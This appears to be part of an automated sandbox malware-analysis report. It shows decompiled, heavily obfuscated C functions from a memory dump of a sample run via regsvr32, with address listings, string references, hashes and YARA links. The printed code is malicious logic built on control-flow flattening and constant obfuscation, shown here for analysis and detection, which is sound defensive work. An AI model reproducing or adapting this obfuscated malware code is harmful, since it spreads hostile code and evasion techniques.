							E04BA0DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
							_t283 = E04B8EFE1(_v576, _v612, _v552,  &_v520);
							_t294 =  *0x4ba6214; // 0x0
							 *((intOrPtr*)(_t294 + 4)) = _t283;
							L23:
							return _t325;
						}
						if(_t289 != 0x9959e7d) {
							goto L20;
						}
						_t285 = E04B9E8B6(_t289, _v572, _v592, _t289, _v564, _v540);
						_t324 = _t285;
						_t327 =  &(_t327[4]);
						if(_t285 == 0) {
							_t289 = 0x7276a71;
						} else {
							_t287 =  *0x4ba6214; // 0x0
							 *((intOrPtr*)(_t287 + 0x20)) = 1;
							_t289 = 0xdb6aac8;
						}
					}
					__eflags = _t289 - 0xc26911c;
					if(_t289 == 0xc26911c) {
						_t311 =  *0x4ba6214; // 0x0
						_t271 = E04B81A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
						_t327 =  &(_t327[8]);
						_t289 = 0x85778ce;
						__eflags = _t271;
						_t272 = 1;
						_t325 =  ==  ? _t272 : _t325;
						goto L20;
					}
					__eflags = _t289 - 0xd8634eb;
					if(_t289 == 0xd8634eb) {
						_push(_t289);
						_push(_t289);
						_t277 = E04B8C5D8(0x444);
						_t327 =  &(_t327[3]);
						 *0x4ba6214 = _t277;
						_t289 = 0x9959e7d;
						goto L1;
					}
					__eflags = _t289 - 0xdb6aac8;
					if(__eflags != 0) {
						goto L20;
					}
					_t289 = 0xa9836df;
					_v536 = _v556;
					goto L1;
					L20:
					__eflags = _t289 - 0xdb6d293;
				} while (__eflags != 0);
				goto L23;
			}

0x04b94a66
0x04b94a6c
0x04b94a76
0x04b94a7e
0x04b94a86
0x04b94a88
0x04b94a8f
0x04b94a97
0x04b94aa6
0x04b94aab
0x04b94ab1
0x04b94ab9
0x04b94ac1
0x04b94ac6
0x04b94ac7
0x04b94acb
0x04b94ad3
0x04b94adb
0x04b94ae0
0x04b94ae8
0x04b94af0
0x04b94af8
0x04b94b00
0x04b94b08
0x04b94b10
0x04b94b18
0x04b94b20
0x04b94b28
0x04b94b30
0x04b94b38
0x04b94b40
0x04b94b48
0x04b94b4d
0x04b94b55
0x04b94b5d
0x04b94b65
0x04b94b6d
0x04b94b75
0x04b94b7d
0x04b94b85
0x04b94b8d
0x04b94b95
0x04b94b9d
0x04b94ba5
0x04b94bad
0x04b94bb2
0x04b94bbf
0x04b94bc3
0x04b94bcb
0x04b94bd3
0x04b94bd8
0x04b94bdc
0x04b94be1
0x04b94be9
0x04b94bf1
0x04b94bf6
0x04b94bfe
0x04b94c06
0x04b94c0e
0x04b94c13
0x04b94c21
0x04b94c25
0x04b94c2d
0x04b94c35
0x04b94c3a
0x04b94c42
0x04b94c4a
0x04b94c57
0x04b94c5b
0x04b94c65
0x04b94c7d
0x04b94c82
0x04b94c8c
0x04b94c91
0x04b94c97
0x04b94c9f
0x04b94ca7
0x04b94cac
0x04b94caf
0x04b94cb3
0x04b94cbb
0x04b94cc0
0x04b94cc8
0x04b94cd0
0x04b94cd8
0x04b94cdd
0x04b94ce5
0x04b94ced
0x04b94cfd
0x04b94d01
0x04b94d06
0x04b94d0e
0x04b94d16
0x04b94d1e
0x04b94d26
0x04b94d2e
0x04b94d36
0x04b94d3e
0x04b94d46
0x04b94d4b
0x04b94d53
0x04b94d5b
0x04b94d63
0x04b94d70
0x04b94d73
0x04b94d77
0x04b94d7f
0x04b94d87
0x04b94d97
0x04b94d9b
0x04b94da0
0x04b94da8
0x04b94db0
0x04b94db5
0x04b94db6
0x04b94dba
0x04b94dbf
0x04b94dc7
0x04b94dcf
0x04b94ddd
0x04b94de1
0x04b94de5
0x04b94de5
0x04b94ded
0x04b94ded
0x04b94ded
0x04b94ded
0x04b94def
0x00000000
0x00000000
0x04b94df5
0x04b94e83
0x04b94e88
0x04b94e6b
0x04b94e6b
0x00000000
0x04b94e6b
0x04b94dfd
0x04b94e67
0x00000000
0x04b94e67
0x04b94e05
0x04b94e57
0x04b94e5c
0x00000000
0x04b94e5c
0x04b94e0d
0x04b94f39
0x04b94f56
0x04b94f5b
0x04b94f64
0x04b94f68
0x04b94f73
0x04b94f73
0x04b94e19
0x00000000
0x00000000
0x04b94e30
0x04b94e35
0x04b94e37
0x04b94e3c
0x04b94e50
0x04b94e3e
0x04b94e3e
0x04b94e46
0x04b94e49
0x04b94e49
0x04b94e3c
0x04b94e8d
0x04b94e8f
0x04b94ef3
0x04b94f02
0x04b94f07
0x04b94f0a
0x04b94f0f
0x04b94f13
0x04b94f14
0x00000000
0x04b94f14
0x04b94e91
0x04b94e97
0x04b94ec0
0x04b94ec1
0x04b94ec7
0x04b94ecc
0x04b94ecf
0x04b94ed4
0x00000000
0x04b94ed4
0x04b94e99
0x04b94e9f
0x00000000
0x00000000
0x04b94ea5
0x04b94ea7
0x00000000
0x04b94f17
0x04b94f17
0x04b94f17
0x00000000

Strings

*-, xrefs: 04B94CA7
7, xrefs: 04B94DB0
]MH[, xrefs: 04B94BF6
&6!, xrefs: 04B94AC1
6&Y, xrefs: 04B94B40
*d>, xrefs: 04B94C65

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *-$&6!$*d>$6&Y$7$]MH[
API String ID: 0-1885758756
Opcode ID: 4ef838b915439b79a18f0a860c35cdea48d5f65a9ab2aa666dca67f5feeabd41
Instruction ID: a32446bb965db8971f715390cde1035b9be02399960160e0c3638e9676de1ce0
Opcode Fuzzy Hash: 4ef838b915439b79a18f0a860c35cdea48d5f65a9ab2aa666dca67f5feeabd41
Instruction Fuzzy Hash: 99D141B15083819FD768CF65C58981BFBE1FBC4758F208A1DF2968A260D3B5D989CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B9CCD9, Relevance: 7.7, Strings: 6, Instructions: 227
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E04B9CCD9(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t282;
				void* _t283;
				signed int _t285;
				signed int* _t287;
				signed int* _t288;

				_t287 =  &_v100;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x71e8b0;
				_v36 = 0x18cf5b;
				_v36 = _v36 + 0x6698;
				_v36 = _v36 ^ 0x001a117a;
				_v60 = 0xa2890;
				_t282 = __edx;
				_t248 = __ecx;
				_t283 = 0x72ed85;
				_t250 = 0x42;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0xe73bacde;
				_v60 = _v60 ^ 0xe73fbe74;
				_v40 = 0x9c8291;
				_t251 = 0x70;
				_v40 = _v40 / _t251;
				_v40 = _v40 ^ 0x000cc374;
				_v64 = 0xa8df6e;
				_t252 = 0x66;
				_v64 = _v64 * 0x5a;
				_v64 = _v64 | 0x6df616d5;
				_v64 = _v64 ^ 0x7ff9e958;
				_v88 = 0xc174cb;
				_v88 = _v88 ^ 0xe7b64a13;
				_v88 = _v88 ^ 0xc84137a7;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0x60915aca;
				_v32 = 0x752193;
				_v32 = _v32 * 0x3f;
				_v32 = _v32 ^ 0x1cda7702;
				_v92 = 0x141833;
				_v92 = _v92 + 0xffffc8f8;
				_v92 = _v92 + 0xf362;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0xd48431d2;
				_v96 = 0xc34044;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffff536d;
				_v96 = _v96 + 0x5d23;
				_v96 = _v96 ^ 0xc334c852;
				_v20 = 0x3a6348;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x6343ca6d;
				_v56 = 0x49cd71;
				_v56 = _v56 ^ 0x72d9145f;
				_v56 = _v56 + 0x4f98;
				_v56 = _v56 ^ 0x7290366b;
				_v24 = 0x3bf83a;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x77f6a760;
				_v28 = 0x632842;
				_v28 = _v28 + 0xffffe69b;
				_v28 = _v28 ^ 0x006ee443;
				_v48 = 0x4b2ed5;
				_v48 = _v48 ^ 0x82c7a85b;
				_v48 = _v48 + 0xffff7c4b;
				_v48 = _v48 ^ 0x8282f052;
				_v52 = 0x4c7b52;
				_v52 = _v52 + 0xffffbc1f;
				_v52 = _v52 + 0x2e12;
				_v52 = _v52 ^ 0x004752b1;
				_v16 = 0x3a13fc;
				_v16 = _v16 / _t252;
				_v16 = _v16 ^ 0x00081e0d;
				_v84 = 0x8573c6;
				_t253 = 0x4b;
				_v84 = _v84 / _t253;
				_v84 = _v84 | 0x42242f90;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x00008b33;
				_v100 = 0x3509ce;
				_t254 = 0x19;
				_v100 = _v100 / _t254;
				_t285 = 0x44;
				_t255 = 0x6f;
				_v100 = _v100 * 0x31;
				_v100 = _v100 + 0x6b64;
				_v100 = _v100 ^ 0x006714bf;
				_v68 = 0x65eeb7;
				_v68 = _v68 + 0x24bd;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x330bb4b3;
				_v72 = 0x31388d;
				_v72 = _v72 * 0x77;
				_v72 = _v72 / _t285;
				_v72 = _v72 ^ 0x00560572;
				_v76 = 0x10ecc2;
				_v76 = _v76 | 0x28471304;
				_v76 = _v76 + 0xcdda;
				_v76 = _v76 ^ 0x285661a5;
				_v44 = 0xf32c83;
				_v44 = _v44 / _t255;
				_v44 = _v44 / _t285;
				_v44 = _v44 ^ 0x000ff213;
				_v80 = 0xb9f4a0;
				_v80 = _v80 << 0xa;
				_v80 = _v80 + 0xd38f;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00ede5ae;
				_v12 = 0x138f30;
				_v12 = _v12 ^ 0xf49e1969;
				_v12 = _v12 ^ 0xf48aec3a;
				while(1) {
					L1:
					_t242 = 0xd8fe181;
					do {
						L2:
						while(_t283 != 0x72ed85) {
							if(_t283 == 0xb6c7232) {
								_t278 = _v52;
								_t255 = _v48;
								_t243 = E04BA1005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
								_t287 =  &(_t287[3]);
								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
								__eflags = _t243;
								_t242 = 0xd8fe181;
								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t283 == 0xc5020c9) {
								_push(_v64);
								_t244 = E04BA3263(_v36, _v60, __eflags, _t248, _v40, _t255);
								_t288 =  &(_t287[4]);
								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
								__eflags = _t244;
								if(_t244 != 0) {
									E04BA148A(_t244, _t244, _v88, _v32, _v92, _v96);
									_t278 = _v56;
									_t255 = _v20;
									E04B8E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
									_t287 =  &(_t288[7]);
									_t283 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t283 == 0xd6f812a) {
									return E04B8F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
								}
								if(_t283 != _t242) {
									goto L13;
								} else {
									_t244 = E04B90EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E04BA25F1);
									_t287 =  &(_t287[8]);
									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
									if(_t244 == 0) {
										_t283 = 0xd6f812a;
										while(1) {
											L1:
											_t242 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t244;
						}
						_t283 = 0xc5020c9;
						L13:
						__eflags = _t283 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t242;
				}
			}

0x04b9ccd9
0x04b9ccdc
0x04b9cce1
0x04b9cce9
0x04b9ccf1
0x04b9ccf9
0x04b9cd01
0x04b9cd11
0x04b9cd13
0x04b9cd19
0x04b9cd1e
0x04b9cd23
0x04b9cd29
0x04b9cd31
0x04b9cd39
0x04b9cd45
0x04b9cd4a
0x04b9cd50
0x04b9cd58
0x04b9cd65
0x04b9cd66
0x04b9cd6a
0x04b9cd72
0x04b9cd7a
0x04b9cd82
0x04b9cd8a
0x04b9cd92
0x04b9cd97
0x04b9cd9f
0x04b9cdac
0x04b9cdb0
0x04b9cdb8
0x04b9cdc0
0x04b9cdc8
0x04b9cdd0
0x04b9cdd5
0x04b9cddd
0x04b9cde5
0x04b9cdea
0x04b9cdf2
0x04b9cdfa
0x04b9ce02
0x04b9ce0a
0x04b9ce0f
0x04b9ce17
0x04b9ce1f
0x04b9ce27
0x04b9ce2f
0x04b9ce37
0x04b9ce3f
0x04b9ce44
0x04b9ce4c
0x04b9ce54
0x04b9ce5c
0x04b9ce64
0x04b9ce6c
0x04b9ce74
0x04b9ce7c
0x04b9ce84
0x04b9ce8c
0x04b9ce94
0x04b9ce9c
0x04b9cea4
0x04b9ceb2
0x04b9ceb6
0x04b9cec0
0x04b9cece
0x04b9ced3
0x04b9ced7
0x04b9cedf
0x04b9cee4
0x04b9ceec
0x04b9cefa
0x04b9ceff
0x04b9cf0a
0x04b9cf0d
0x04b9cf0e
0x04b9cf12
0x04b9cf1a
0x04b9cf22
0x04b9cf2a
0x04b9cf32
0x04b9cf37
0x04b9cf3f
0x04b9cf4c
0x04b9cf58
0x04b9cf5c
0x04b9cf64
0x04b9cf6c
0x04b9cf74
0x04b9cf7c
0x04b9cf84
0x04b9cf94
0x04b9cfa3
0x04b9cfa7
0x04b9cfaf
0x04b9cfb7
0x04b9cfbc
0x04b9cfc4
0x04b9cfc9
0x04b9cfd1
0x04b9cfd9
0x04b9cfe1
0x04b9cfe9
0x04b9cfe9
0x04b9cfe9
0x04b9cfee
0x00000000
0x04b9cfee
0x04b9d000
0x04b9d0bc
0x04b9d0c0
0x04b9d0c4
0x04b9d0c9
0x04b9d0cc
0x04b9d0cf
0x04b9d0d3
0x04b9d0d8
0x00000000
0x04b9d0d8
0x04b9d00c
0x04b9d04e
0x04b9d060
0x04b9d065
0x04b9d068
0x04b9d06b
0x04b9d06d
0x04b9d087
0x04b9d097
0x04b9d09b
0x04b9d09f
0x04b9d0a4
0x04b9d0a7
0x00000000
0x04b9d0a7
0x04b9d00e
0x04b9d010
0x00000000
0x04b9d108
0x04b9d018
0x00000000
0x04b9d01e
0x04b9d037
0x04b9d03c
0x04b9d03f
0x04b9d044
0x04b9d04a
0x04b9cfe9
0x04b9cfe9
0x04b9cfe9
0x00000000
0x04b9cfe9
0x04b9cfe9
0x04b9d044
0x04b9d018
0x04b9d110
0x04b9d110
0x04b9d0e0
0x04b9d0e5
0x04b9d0e5
0x04b9d0e5
0x00000000
0x04b9cfee

Strings

$P, xrefs: 04B9CD0F, 04B9D023
dk, xrefs: 04B9CF12
Cn, xrefs: 04B9CE5C
#], xrefs: 04B9CDF2
Hc:, xrefs: 04B9CE02
R{L, xrefs: 04B9CE84

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #]$$P$Cn$Hc:$R{L$dk
API String ID: 0-1551317889
Opcode ID: 858ef29d4b2b127416d11bc31985bcf130a0b6563cdba896563cce04edc404ad
Instruction ID: f081a5b05df92784faa0d7b05511d87f71adeda508f00ee90448f73fe7aa7ba0
Opcode Fuzzy Hash: 858ef29d4b2b127416d11bc31985bcf130a0b6563cdba896563cce04edc404ad
Instruction Fuzzy Hash: ADB130B29083419FD758CF26C54941BFBE2FBC4748F008A2DF59996260D3B5DA59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04B8F369, Relevance: 7.7, Strings: 6, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04B8F369(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t207;
				void* _t210;
				void* _t213;
				void* _t214;
				void* _t216;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				void* _t241;
				signed int* _t243;
				void* _t246;

				_t243 =  &_v88;
				_v16 = 0x3949c2;
				asm("stosd");
				_t214 = __ecx;
				_t241 = 0;
				_t216 = 0x68b8c0f;
				asm("stosd");
				asm("stosd");
				_v76 = 0x201aab;
				_t234 = 0x76;
				_v76 = _v76 / _t234;
				_v76 = _v76 + 0xe408;
				_t235 = 0xc;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0x004fdd99;
				_v44 = 0xd502f1;
				_v44 = _v44 | 0x910f8184;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x0c2ba140;
				_v48 = 0xe41bd4;
				_v48 = _v48 ^ 0x89eac382;
				_t236 = 0x67;
				_v48 = _v48 / _t236;
				_v48 = _v48 ^ 0x015e526e;
				_v24 = 0xf49d06;
				_v24 = _v24 | 0x486b4754;
				_v24 = _v24 ^ 0x48f37dd9;
				_v88 = 0xd25a8e;
				_v88 = _v88 ^ 0x0de03e2c;
				_v88 = _v88 >> 8;
				_t237 = 0x57;
				_v88 = _v88 / _t237;
				_v88 = _v88 ^ 0x00057327;
				_v32 = 0x480afd;
				_v32 = _v32 ^ 0x00453f61;
				_v60 = 0x165baf;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0xd8cf9c31;
				_v60 = _v60 ^ 0x81a5172b;
				_v84 = 0x2fcd58;
				_v84 = _v84 + 0x335f;
				_v84 = _v84 + 0xffff6358;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0x5ec42bb0;
				_v40 = 0xbc2783;
				_v40 = _v40 + 0xffff2ae1;
				_t238 = 0xa;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 ^ 0x44c8bdaa;
				_v72 = 0xc9404f;
				_v72 = _v72 | 0xfaaf7fa5;
				_v72 = _v72 / _t238;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000be8dc;
				_v56 = 0xcb8585;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0xa4d175a3;
				_v56 = _v56 ^ 0xa4d4e9a5;
				_v28 = 0xfbd7ad;
				_v28 = _v28 + 0xffffc7a7;
				_v28 = _v28 ^ 0x00f429b0;
				_v80 = 0x6cf7c4;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0xc9851cf7;
				_v80 = _v80 + 0xe116;
				_v80 = _v80 ^ 0xae3f2149;
				_v52 = 0xd995b1;
				_v52 = _v52 + 0x112b;
				_v52 = _v52 + 0xffff70e0;
				_v52 = _v52 ^ 0x00d4086e;
				_v64 = 0x3e6f55;
				_v64 = _v64 ^ 0x64233eb3;
				_v64 = _v64 + 0xfffff8c9;
				_v64 = _v64 + 0xffffb5e5;
				_v64 = _v64 ^ 0x64179829;
				_v68 = 0x30eb6c;
				_t239 = 0x37;
				_v68 = _v68 / _t239;
				_v68 = _v68 + 0xffffeee1;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x000816d3;
				_v20 = 0x71a516;
				_v20 = _v20 | 0x2f4429e5;
				_v20 = _v20 ^ 0x2f784372;
				_v36 = 0xda1832;
				_v36 = _v36 * 0x4c;
				_v36 = _v36 + 0xffff5a89;
				_v36 = _v36 ^ 0x40b976b8;
				goto L1;
				do {
					while(1) {
						L1:
						_t246 = _t216 - 0x68b8c0f;
						if(_t246 > 0) {
							break;
						}
						if(_t246 == 0) {
							_t216 = 0xe6264d6;
							continue;
						} else {
							if(_t216 == 0x8a1c17) {
								_push(_t216);
								_t202 = E04B907F0();
								_t243 =  &(_t243[1]);
								_t216 = 0xf218af8;
								_t241 = _t241 + _t202;
								continue;
							} else {
								if(_t216 == 0x50fe579) {
									_t241 = _t241 + E04B9BE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
								} else {
									if(_t216 == 0x530d654) {
										_push(_t216);
										_t207 = E04B907F0();
										_t243 =  &(_t243[1]);
										_t216 = 0x8a5806a;
										_t241 = _t241 + _t207;
										continue;
									} else {
										if(_t216 != 0x5e83455) {
											goto L17;
										} else {
											_push(_t216);
											_t210 = E04B907F0();
											_t243 =  &(_t243[1]);
											_t216 = 0x530d654;
											_t241 = _t241 + _t210;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t241;
					}
					if(_t216 == 0x8a5806a) {
						_push(_t216);
						_t198 = E04B907F0();
						_t243 =  &(_t243[1]);
						_t216 = 0x8a1c17;
						_t241 = _t241 + _t198;
						goto L17;
					} else {
						if(_t216 == 0xe6264d6) {
							_t199 = E04B9BE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
							_t243 =  &(_t243[3]);
							_t216 = 0x5e83455;
							_t241 = _t241 + _t199;
							goto L1;
						} else {
							if(_t216 != 0xf218af8) {
								goto L17;
							} else {
								_push(_t216);
								_t213 = E04B907F0();
								_t243 =  &(_t243[1]);
								_t216 = 0x50fe579;
								_t241 = _t241 + _t213;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t216 != 0x3fc4e73);
				goto L20;
			}

0x04b8f369
0x04b8f36c
0x04b8f380
0x04b8f388
0x04b8f38a
0x04b8f38c
0x04b8f38e
0x04b8f38f
0x04b8f390
0x04b8f39c
0x04b8f3a1
0x04b8f3a7
0x04b8f3b4
0x04b8f3b7
0x04b8f3bb
0x04b8f3c3
0x04b8f3cb
0x04b8f3db
0x04b8f3df
0x04b8f3e7
0x04b8f3ef
0x04b8f3fb
0x04b8f400
0x04b8f406
0x04b8f40e
0x04b8f416
0x04b8f41e
0x04b8f426
0x04b8f42e
0x04b8f436
0x04b8f43f
0x04b8f444
0x04b8f44a
0x04b8f452
0x04b8f462
0x04b8f46a
0x04b8f472
0x04b8f477
0x04b8f47f
0x04b8f487
0x04b8f48f
0x04b8f497
0x04b8f49f
0x04b8f4a4
0x04b8f4ac
0x04b8f4b4
0x04b8f4c1
0x04b8f4c2
0x04b8f4c6
0x04b8f4ce
0x04b8f4d6
0x04b8f4e4
0x04b8f4ea
0x04b8f4ef
0x04b8f4f7
0x04b8f4ff
0x04b8f504
0x04b8f50c
0x04b8f514
0x04b8f51c
0x04b8f524
0x04b8f52c
0x04b8f534
0x04b8f539
0x04b8f541
0x04b8f549
0x04b8f551
0x04b8f559
0x04b8f561
0x04b8f569
0x04b8f571
0x04b8f579
0x04b8f581
0x04b8f589
0x04b8f591
0x04b8f599
0x04b8f5a7
0x04b8f5af
0x04b8f5b3
0x04b8f5bb
0x04b8f5c0
0x04b8f5c8
0x04b8f5d0
0x04b8f5d8
0x04b8f5e0
0x04b8f5ed
0x04b8f5f1
0x04b8f5f9
0x04b8f5f9
0x04b8f601
0x04b8f601
0x04b8f601
0x04b8f601
0x04b8f603
0x00000000
0x00000000
0x04b8f605
0x04b8f67d
0x00000000
0x04b8f607
0x04b8f60d
0x04b8f66b
0x04b8f66c
0x04b8f671
0x04b8f674
0x04b8f679
0x00000000
0x04b8f60f
0x04b8f615
0x04b8f71a
0x04b8f61b
0x04b8f621
0x04b8f651
0x04b8f652
0x04b8f657
0x04b8f65a
0x04b8f65f
0x00000000
0x04b8f623
0x04b8f629
0x00000000
0x04b8f62f
0x04b8f637
0x04b8f638
0x04b8f63d
0x04b8f640
0x04b8f645
0x00000000
0x04b8f645
0x04b8f629
0x04b8f621
0x04b8f615
0x04b8f60d
0x04b8f71d
0x04b8f725
0x04b8f725
0x04b8f687
0x04b8f6e1
0x04b8f6e2
0x04b8f6e7
0x04b8f6ea
0x04b8f6ef
0x00000000
0x04b8f689
0x04b8f68b
0x04b8f6c5
0x04b8f6ca
0x04b8f6cd
0x04b8f6d2
0x00000000
0x04b8f68d
0x04b8f693
0x00000000
0x04b8f695
0x04b8f69d
0x04b8f69e
0x04b8f6a3
0x04b8f6a6
0x04b8f6ab
0x00000000
0x04b8f6ab
0x04b8f693
0x04b8f68b
0x00000000
0x04b8f6f1
0x04b8f6f1
0x00000000

Strings

a?E, xrefs: 04B8F462
_3, xrefs: 04B8F48F
rCx/, xrefs: 04B8F5D8
Uo>, xrefs: 04B8F571
l0, xrefs: 04B8F599
,>, xrefs: 04B8F42E

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,>$Uo>$_3$a?E$l0$rCx/
API String ID: 0-1805074986
Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction ID: d26bf414f79497f74b9b272333199ffe9133c803738387252f705231755d9a75
Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction Fuzzy Hash: 339175B2A083409BD758DF25D48941FBBF1FBD8758F104A2DFA8696260D3B6D908CB43

Uniqueness

Uniqueness Score: -1.00%

Function 04B98806, Relevance: 7.7, Strings: 6, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B98806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t156;
				void* _t172;
				void* _t174;
				void* _t177;
				void* _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				intOrPtr _t216;
				signed int* _t219;

				_t215 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_t156);
				_v76 = 0x923182;
				_t219 =  &(( &_v140)[4]);
				_v72 = 0xa31cb9;
				_t216 = 0;
				_v68 = 0;
				_v64 = 0;
				_t189 = 0xe0c62fa;
				_v120 = 0x4473bb;
				_t183 = 0x46;
				_v120 = _v120 / _t183;
				_v120 = _v120 << 6;
				_v120 = _v120 ^ 0x003879f9;
				_v100 = 0x40bbdb;
				_t184 = 0x64;
				_v100 = _v100 * 0x13;
				_v100 = _v100 ^ 0x04c6e1a5;
				_v140 = 0x8d0a20;
				_v140 = _v140 * 0x6a;
				_v140 = _v140 + 0x25b5;
				_v140 = _v140 * 0x47;
				_v140 = _v140 ^ 0x32607187;
				_v84 = 0x381a9b;
				_v84 = _v84 + 0xbdad;
				_v84 = _v84 ^ 0x00352eaa;
				_v124 = 0x2aec69;
				_v124 = _v124 | 0x10e7a47b;
				_v124 = _v124 ^ 0x113e433b;
				_v124 = _v124 / _t184;
				_v124 = _v124 ^ 0x000f1a56;
				_v80 = 0x7d6845;
				_v80 = _v80 + 0xffff13df;
				_v80 = _v80 ^ 0x0079135d;
				_v92 = 0x295f3e;
				_v92 = _v92 + 0xbf8d;
				_v92 = _v92 ^ 0x0026878e;
				_v116 = 0x37f4f;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0x3a5c;
				_v116 = _v116 ^ 0x00effc52;
				_v132 = 0xa2ba8e;
				_v132 = _v132 + 0x1d0a;
				_v132 = _v132 | 0x3462f83d;
				_t185 = 0x33;
				_v132 = _v132 * 0x30;
				_v132 = _v132 ^ 0xea8b61c3;
				_v128 = 0xc1a215;
				_v128 = _v128 / _t185;
				_v128 = _v128 | 0x8f52208d;
				_v128 = _v128 + 0x2564;
				_v128 = _v128 ^ 0x8f53844f;
				_v108 = 0x49ebcc;
				_v108 = _v108 * 0x2a;
				_v108 = _v108 ^ 0x0c2cea59;
				_v136 = 0x4a157a;
				_t186 = 0x59;
				_v136 = _v136 / _t186;
				_v136 = _v136 >> 1;
				_v136 = _v136 << 9;
				_v136 = _v136 ^ 0x00dde8e3;
				_v96 = 0x85f352;
				_v96 = _v96 | 0xf8883f30;
				_v96 = _v96 ^ 0xf88ae245;
				_v104 = 0xc8529d;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00006ec5;
				_v88 = 0xa01b;
				_v88 = _v88 + 0xf4b;
